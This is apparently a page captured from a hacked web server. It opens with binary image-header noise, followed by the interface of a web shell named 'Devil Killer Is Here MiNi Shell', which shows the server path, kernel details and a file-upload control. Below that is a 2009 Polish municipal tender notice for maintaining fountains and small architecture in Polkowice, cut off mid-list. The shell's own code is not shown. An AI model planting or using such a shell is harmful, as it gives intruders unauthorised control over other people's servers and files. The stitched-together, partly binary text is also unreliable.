JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090219/39851-N-2009.html

<p class="kh_header"><b>Polkowice: Remonty małej architektury na terenie gminy - Sektor 1 i Sektor 2</b><br>
<b>Numer ogłoszenia: 39851 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polkowice , Rynek 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 84 74 121, faks 076 72 46 780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty małej architektury na terenie gminy - Sektor 1 i Sektor 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie obejmuje eksploatację fontann oraz bieżące remonty małej architektury na terenie miasta i gminy Polkowice, polegające na: naprawie, wymianie, montażu lub demontażu elementów małej architektury (ławki, siedziska, elementy urządzeń komunalnych, pergole, ogrodzenia, murki, nawierzchnie, itp.),  w podziale na sektory: 
SEKTOR 1 - osiedle Sienkiewicza, osiedle Centrum, Stare Miasto, osiedle Gwarków (bez Placu Honorowych Dawców Krwi), ul. Spokojna ze ścieżką zdrowia, dawne Polkowice Dolne oraz wsie gminy: Biedrzychowa, Jędrzychów, Sobin , Nowa Wieś Lubińska - CZĘŚĆ 1.
SEKTOR 2 - os.  Krupińskiego, Plac Honorowych Dawców Krwi,  tereny pomiędzy  ulicami: Dąbrowskiego, Kolejową i Przemysłową, os. Młodych, os. Polanka, os. Staszica, os. Dąbrowskiego, os. Hubala, Park przy Stadionie Miejskim, oraz wsie gminy: Sucha Górna, Kaźmierzów, Moskorzyn, Żuków, Komorniki, Tarnówek, Guzice, Trzebcz, Dąbrowa, Pieszkowice, Żelazny Most, - CZĘŚĆ 2.
Zadanie będzie rozliczane przy zastosowaniu cen ryczałtowych oraz cen jednostkowych:
- w cenach ryczałtowych należy uwzględnić koszty uruchomienia, bieżących napraw, codziennego utrzymania oraz konserwacji fontann na okres zimy. W przypadku wystąpienia konieczności montażu nowych elementów koszt ich będzie rozliczany na podstawie faktury wystawionej przez producenta. Przed zakupem należy uzyskać zgodę inspektora co do ceny oraz producenta.
- w cenach jednostkowych należy uwzględnić koszty materiałów (z wyjątkiem: ust b, pkt 21/, 22/, 23/, 24/,), robocizny, a także wszystkie koszty związane z pracami przygotowawczymi, porządkowymi, organizacją terenu robót, transportu, deponowania odpadów itp.
A. Charakterystyka dla cen ryczałtowych z podziałem na sektory:
 Zakres dotyczący Sektora Nr 1
1/ eksploatacja fontanny w Rynku w okresach od 01.04.2009 do 30.10.2009 i od 01.04.2010 do 30.10.2010:
-	przygotowanie fontanny do eksploatacji od 01.04 do 07.04 (wyczyszczenie studni i instalacji wodnej, montaż pompy oraz dysz);
-	uruchomienie fontanny po okresie zimowym;
-	bieżące włączanie i wyłączanie fontanny (codzienne wyłączanie  na noc i włączanie rano oraz wyłączanie na czas intensywnych opadów deszczu), codzienna kontrola prawidłowości jej działania wraz z czyszczeniem (zbieranie nieczystości, udrażnianie i ustawianie dysz);
-	odkażanie wody, wg potrzeb, środkami nieszkodliwymi dla ludzi i zwierząt (wg wskazań producenta środka odkażającego);
-	bieżące naprawy, usuwanie drobnych usterek, itp.,
-	konserwacja - przygotowanie do okresu zimowego: opróżnienie i wyczyszczenie studni, demontaż pompy i dysz, zabezpieczenie zaworów przed przemarzaniem, smarowanie elementów podatnych na korozje.
2/  eksploatacja fontanny przy obiekcie PCUZ od 01.04.2009 do 30.10.2009 i od 01.04.2010 30.10.2010:
-	przygotowanie fontanny do eksploatacji od 01.04 do 07.04 (wyczyszczenie studni, misy i instalacji wodnej, montaż pompy oraz dyszy);
-	uruchomienie fontanny po okresie zimowym;
-	bieżące włączanie i wyłączanie fontanny (codzienne wyłączanie  na noc i włączanie rano oraz wyłączanie na czas intensywnych opadów deszczu), codzienna kontrola prawidłowości jej działania wraz z czyszczeniem misy oraz terenu wokół (zbieranie nieczystości, udrażnianie i ustawianie dysz);
-   odkażanie wody, wg potrzeb, środkami nieszkodliwymi dla ludzi i zwierząt (wg wskazań producenta środka odkażającego);
-	bieżące naprawy, usuwanie drobnych usterek, itp.;
-	konserwacja - przygotowanie do okresu zimowego: opróżnienie i wyczyszczenie studni, demontaż pompy i dyszy, zabezpieczenie zaworów przed przemarzaniem, smarowanie elementów podatnych na korozje.
3/ eksploatacja fontanny przy ul. Ociosowej  od 01.04.2009 do 30.10.2009 i od 01.04.2010 30.10.2010:
-	przygotowanie fontanny do eksploatacji od 01.04 do 07.04 (wyczyszczenie studni i niecki zbiornika, wyczyszczenie instalacji wodnej, montaż pompy oraz dyszy);
-	uruchomienie fontanny po okresie zimowym;
-	bieżące włączanie i wyłączanie fontanny (codzienne wyłączanie  na noc i włączanie rano oraz wyłączanie na czas intensywnych opadów deszczu), codzienna kontrola ciągłości jej działania wraz z czyszczeniem (zbieranie nieczystości z lustra wody i terenu wokół);
-	comiesięcznie czyszczenie niecki zbiornika (opróżnienie zbiornika, oczyszczenie niecki, napełnienie zbiornika, zawsze w ostatnim tygodniu miesiąca);
-	odkażanie wody, wg potrzeb, środkami nieszkodliwymi dla ludzi i zwierząt (wg wskazań producenta środka odkażającego);
-	bieżące naprawy, usuwanie drobnych usterek, itp.;
-	konserwacja - przygotowanie do okresu zimowego: opróżnienie i wyczyszczenie studni i niecki zbiornika, demontaż pompy, zabezpieczenie zaworów przed przemarzaniem, smarowanie elementów podatnych na korozje.
4/ eksploatacja fontanny przy ul. Kmicica od 01.04.2009 do 30.10.2009 i od 01.04.2010 30.10.2010:
-	przygotowanie fontanny do eksploatacji od 01.04 do 07.04 (wyczyszczenie studni, koryt i instalacji wodnej, montaż pompy oraz dyszy);
-	uruchomienie fontanny po okresie zimowym;
-	bieżące włączanie i wyłączanie fontanny (codzienne wyłączanie  na noc i włączanie rano oraz wyłączanie na czas intensywnych opadów deszczu), codzienna kontrola ciągłości jej działania wraz z czyszczeniem (zbieranie nieczystości, czyszczenie, odmulanie korytek i terenu wokół);
-	odkażanie wody wg potrzeb, środkami nieszkodliwymi dla ludzi i zwierząt (wg wskazań producenta środka odkażającego);
-	bieżące naprawy, usuwanie drobnych usterek, itp.;
-	konserwacja - przygotowanie do okresu zimowego: opróżnienie i wyczyszczenie studni i rynien, demontaż pompy, zabezpieczenie zaworów przed przemarzaniem, smarowanie elementów podatnych na korozje.
Zakres dotyczący Sektora Nr 2
1/ eksploatacja fontanny na Placu Honorowych Dawców Krwi od 01.04.2009 do 30.10.2009 i od 01.04.2010 30.10.2010:
-	przygotowanie fontanny do eksploatacji od 01.04 do 07.04 (wyczyszczenie studni, niecki zbiornika i instalacji wodnej, montaż pompy);
-	uruchomienie fontanny po okresie zimowym;
-	bieżące włączanie i wyłączanie fontanny (codzienne wyłączanie  na noc i włączanie rano oraz wyłączanie na czas intensywnych opadów deszczu), codzienna kontrola ciągłości jej działania wraz  z czyszczeniem (zbieranie nieczystości z niecki i terenu wokół, mycie kamiennej kuli),
-	odkażanie wody, wg potrzeb, środkami nieszkodliwymi dla ludzi i zwierząt (wg wskazań producenta środka odkażającego);
-	bieżące naprawy, usuwanie drobnych usterek, itp.;
-	konserwacja - przygotowanie do okresu zimowego: opróżnienie i wyczyszczenie studni i niecki, demontaż pompy, zabezpieczenie zaworów przed przemarzanie, smarowanie elementów podatnych na korozje.
B. Charakterystyka  cen jednostkowych wspólna dla Sektorów 1 i 2 , w których należy uwzględnić: 
1/  Demontaż siatki ogrodzeniowej.
Ręczne rozebranie elementów siatki wraz ze wszystkimi łącznikami typu nity, śruby itp., posegregowanie, uporządkowanie terenu i oczyszczenie miejsca demontażu.
      2/ Demontaż elementów konstrukcji metalowej.
Ręczne rozebranie elementów metalowych wraz ze wszystkimi łącznikami typu nity, śruby itp., posegregowanie, uporządkowanie terenu i oczyszczenie miejsca demontażu.
3/ Demontaż elementów drewnianych.
Rozebranie elementu drewnianego wraz ze wszystkimi łącznikami typu gwoździe, śruby itp., posegregowanie, uporządkowanie terenu, wywiezienie elementów na miejsce składowania wg wskazań inspektora nadzoru na odległość do 8 km oraz składowanie.
4/ Demontaż gotowego elementu z tworzywa sztucznego, gumy, plastiku itp.
Ręczne rozebranie elementów z tworzyw sztucznych, gumy itp. wraz ze wszystkimi łącznikami typu gwoździe, śruby itp., posegregowanie, uporządkowanie terenu, wywiezienie elementów na miejsce składowania oraz składowanie.
      5/ Demontaż ławki wraz z fundamentem.
Ręczne odkopanie fundamentów, demontaż ławki wraz ze wszystkimi elementami, zasypanie wykopu i odtworzenie nawierzchni, uporządkowanie terenu (w przypadku gdy ławka zostanie przeznaczona do ponownego wykorzystania należy przewieść ją do gminnego budynku gospodarczego przy ul. Cisowej).  
6/ Rozbiórka elementów betonowych.
Odkopanie ręczne elementu betonowego, rozbiórka elementu, usunięcie gruzu, zasypanie wykopu, wyrównanie powierzchni, uporządkowanie terenu, wywiezienie elementów betonowych na miejsce składowania oraz składowanie.
7/ Rozbiórka elementów murowanych z bloczków betonowych, pustaków, cegieł itp.
Usunięcie cegieł, bloczków, pustaków itp., uporządkowanie terenu, wywiezienie elementów betonowych na miejsce składowania oraz składowanie.
8/ Usunięcie 1 tony nawierzchni betonowej.
Cięcie szczelin, rozkruszenie nawierzchni betonowej młotem wyburzeniowym, odkucie oskardem drobnych pozostałości podbudowy , załadowanie materiału z rozbiórki koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie.
9/ Usunięcie nawierzchni sypkiej (piasek, żwir, humus, itp.).
Usunięcie nawierzchni koparką lub ręcznie, załadowanie materiału  koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie, uporządkowanie terenu.
10/ Uzupełnienie nawierzchni sypkiej (piasek, żwir, humus, itp.).
Zakup i transport nawierzchni sypkiej na miejsce wbudowania, uzupełnienie brakującej nawierzchni, wyrównanie nawierzchni , uporządkowanie terenu.
      11/ Uzupełnienie obrzeża - wbudowanie obrzeża betonowego.
Odtworzenie rowków, rozścielenie podsypki piaskowej, ustawienie obrzeży, wyregulowanie obrzeży wg podanych punktów wysokościowych, oczyszczenie i wypełnienie spoin piaskiem lub zaprawą cementową wraz z jej przygotowaniem, obsypanie zewnętrznej ściany obrzeży ziemią wraz z jej ubiciem.
12/ Uzupełnienie nawierzchni z kostki  betonowej lub płytek chodnikowych.
Odtworzenie  koryta wraz z jego wyprofilowaniem, rozścielenie podsypki piaskowej, ułożenie nawierzchni z kostki betonowej lub płytek chodnikowych na wykonanej i wyrównanej podsypce, ubicie elementów nawierzchni, wypełnienie spoin przez zamulenie piaskiem, usunięcie nadmiaru piasku pozostałego po zamuleniu spoin. 
13/ Uzupełnienie siatki ogrodzeniowej.
Przygotowanie siatki, transport na miejsce montażu, zamontowanie siatki przy zastosowaniu odpowiednich łączników. 
14/ Uzupełnienie ścianki z cegły.
Usunięcie uszkodzonej cegły lub pozostałości po cegle, oczyszczenie, przygotowanie otworu, wmurowanie nowej cegły oraz spoinowanie (należy przyjąć wbudowanie cegły pełnej zwykłej), uporządkowanie terenu.
15/ Uzupełnienie tynku zewnętrznego.
Usunięcie fragmentów odpadającego tynku, oczyszczenie podłoża, zagruntowanie, wykonanie warstwy tynku cementowo-wapiennego, uporządkowanie terenu.
16/ Malowanie elementu metalowego.
Wyczyszczenie elementu metalowego z brudu, kurzu, rdzy oraz zeskrobanie łuszczącej się farby przy pomocy szpachli, dokładne wyszlifowanie powierzchni papierem ściernym, dwukrotne malowanie farbą do stosowania bezpośrednio na rdzę, uporządkowanie terenu.
17/ Malowanie siatki ogrodzeniowej.
Wyczyszczenie elementu metalowego z brudu, kurzu, rdzy oraz zeskrobanie łuszczącej się farby przy użyciu szczotki drucianej, dwukrotne malowanie farbą do stosowania bezpośrednio na rdzę, uporządkowanie terenu.
18/ Malowanie  powierzchni otynkowanej.
Oczyszczenie powierzchni z zagruntowaniem, dwukrotne malowanie farbą emulsyjną zewnętrzną, uporządkowanie terenu.
19/ Malowanie elementu drewnianego lakierobejcą.
Wyszlifowanie powierzchni papierem ściernym, dwukrotne malowanie lakierobejcą do stosowania na zewnątrz, uporządkowanie terenu.
20/ Malowanie elementu drewnianego impregnatem.
Wyszlifowanie powierzchni papierem ściernym, dwukrotne malowanie impregnatem do stosowania na zewnątrz, uporządkowanie terenu.
21/ Montaż ławki łącznie z fundamentem.
Ręczne wykonanie wykopów pod fundamenty, zamontowanie gotowych fundamentów do ławki osadzenie ławki, wypoziomowanie ławki, zasypanie fundamentów i odtworzenie nawierzchni.
22/ Montaż  elementu drewnianego.
Przygotowanie elementów, transport na miejsce montażu, zamontowanie elementu przy zastosowaniu łączników, połączeń ciesielski, uporządkowanie terenu.
      23/ Montaż gotowego elementu z tworzywa sztucznego, gumy itp.
Wstępne dopasowanie elementu, zamontowanie gotowego elementu przy zastosowaniu łączników, uporządkowanie terenu.
24/ Montaż elementu konstrukcji metalowej.
Przygotowanie elementu, transport na miejsce montażu, zamontowanie gotowego elementu przy zastosowaniu łączników
      25/ Wymiana nawierzchni- wbudowanie mieszanki betonowej.
Cięcie szczelin, rozkruszenie nawierzchni betonowej młotem wyburzeniowym, odkucie oskardem drobnych pozostałości podbudowy, załadowanie materiału z rozbiórki koparką lub ręcznie na samochód samowyładowczy wraz z wywozem materiału z rozbiórki na miejsce składowania i składowanie, uzupełnienie ubytków  betonem B20  wraz z pielęgnacją betonu, wyrównanie powierzchni, uporządkowanie terenu.
26/ Naprawa  nawierzchni z kostki betonowej lub płytek chodnikowych.
Rozebranie nawierzchni z kostki betonowej lub płyt chodnikowych, usunięcie nierówności ( korzenie, kamienie itp.) uzupełnienie podsypki piaskowej wraz z jej ubiciem, ułożenie nawierzchni na uzupełnionej, wyrównanej i ubitej podsypce, ubicie elementów nawierzchni, wypełnienie spoin przez zamulenie piaskiem, usunięcie nadmiaru piasku pozostałego po zamuleniu spoin.
UWAGI dotyczące zakresów objętych cenami jednostkowymi
- Odnośnie pkt 1/,2/, 5/.
Elementy metalowe posegregować:
- nadające się do ponownego wykorzystania przewieźć i złożyć w gminnym budynku gospodarczym ul. Cisowa 12;
- nie nadające do ponownego wykorzystania sprzedać w punkcie skupu złomu. Wykonawca pomniejszy koszty wykonanych robót o kwotę sprzedaży złomu wynikającą z faktury wystawionej w punkcie skupu;
- skorodowane, nie nadające się do sprzedaży w skupie złomu wywieźć na miejsce składowania (do 6 km) i składować.
Każdorazowo po segregacji należy uzgodnić z inspektorem nadzoru przeznaczenie zdemontowanych elementów metalowych.
- Odnośnie pkt  3/, 5/.
Elementy drewniane posegregować:
-  nie nadające się do ponownego wykorzystania (zbutwiałe) wywieźć na miejsce składowania (do 6 km) i składować;
-  nadające się na opał przewieźć na miejsce wskazane przez inspektora nadzoru (do 8 km) i złożyć;
- nadające się do ponownego wykorzystania przewieźć i złożyć przy gminnym budynku gospodarczym ul. Cisowej 12. 
Każdorazowo po segregacji, należy uzgodnić z inspektorem nadzoru przeznaczenie zdemontowanych elementów drewnianych.
- Odnośnie pkt 16/,17/,18/,19/,20/.
Przed malowaniem wykonawca ma obowiązek zabezpieczyć elementy otoczenia narażone na zabrudzenie przez kapiącą farbę.
- Odnośnie pkt 21/,22/,23/,24/. 
W przypadku wystąpienia konieczności montażu nowych elementów koszt ich będzie rozliczany na podstawie faktury wystawionej przez producenta. Przed zakupem należy uzyskać zgodę inspektora co do ceny oraz producenta.
Zamawiający wymaga, aby na wykonany przedmiot zamówienia Wykonawca udzielił minimum 12-miesięcznej gwarancji.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie przed terminem składania ofert wadium w wysokości: 
część 1 - 2.000,00 zł (słownie: dwa tysiące złotych i 00/100)
część 2 - 2.000,00 zł (słownie: dwa tysiące złotych i 00/100)
tj. do 13.03.2009 r., godz. 10.00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w przetargu dopuszczeni zostaną Wykonawcy, którzy:
1.	Spełnią warunki określone w art. 22 ust.1 ustawy.
2.	Spełnią warunki określone w niniejszej specyfikacji.
3.	Spełnią poniższe warunki:
- wykażą  należyte wykonanie, w okresie ostatnich pięciu lat przed dniem ogłoszenia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej trzech robót o podobnym charakterze na łączną kwotę min. 200.000 zł brutto tj. robót z zakresu remontu, konserwacji, napraw urządzeń małej architektury tj. ławek, pergoli, murków itp., z określeniem zakresu i wartości robót, dat i miejsca wykonania wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych zadań (np. referencje);
- posiadają i przedłożą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności na kwotę min. 150.000,00 zł wraz z dowodem uiszczenia należnych składek. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy. W przypadku, kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy, wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu,
- wniosą wadium przed upływem terminu składania ofert.

Ocena spełnienia warunków udziału ma charakter eliminacyjny. Do udziału w postępowaniu dopuszczeni zostaną wykonawcy, którzy spełniają wszystkie warunki udziału w postępowaniu. Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia/nie spełnia na podstawie oświadczenia oraz przedłożonych wraz z ofertą dokumentów wymienionych poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy, o przyjęciu warunków SIWZ,
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika,
d)	polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności gospodarczej na kwotę minimum 150.000 zł, wraz z dowodem uiszczenia należnych składek. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy. W przypadku kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu;
e)	wykaz  wykonanych w okresie ostatnich pięciu lat przed dniem ogłoszenia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej trzech robót o podobnym charakterze na łączną kwotę min. 200.000 zł brutto tj. robót z zakresu remontu, konserwacji, napraw urządzeń małej architektury tj. ławek, pergoli, murków itp., z określeniem zakresu i wartości robót, dat i miejsca wykonania wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych zadań (np. referencje);
f)	kserokopia dowodu wniesienia wadium podpisana za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela, dopuszcza się przedłożenie wyżej wymienionego dokumentu do wglądu członkom komisji przetargowej, w trakcie otwarcia ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt  b - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokumenty, o których mowa powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Uwaga:
1.	Dokumenty, o których mowa powyżej powinny być przedstawione w formie oryginału lub potwierdzonej za zgodność kserokopii dokumentu.
2.	Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw,  lub którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
3.	W przypadku składania oferty przez podmioty występujące wspólnie, dokumenty wymienione w pkt. a, b, muszą być złożone przez każdy podmiot. Każdy z podmiotów występujących wspólnie powinien przedłożyć wraz z ofertą aktualną polisę lub inny dokument ubezpieczenia w zakresie prowadzonej działalności gospodarczej, a suma kwot wynikających z tych dokumentów powinna wynosić minimum 150.000 zł.
4.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.
5.	Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki.
6.	W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez te podmioty wspólnego pełnomocnika.
7.	Wykonawca zobowiązuje się sporządzić umowę konsorcjum po wyborze oferty tj. w okresie między wygraniem przetargu a podpisaniem umowy o zamówienie.
8.	Umowa konsorcyjna musi zawierać:
-	określenie celu gospodarczego,
-	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi,
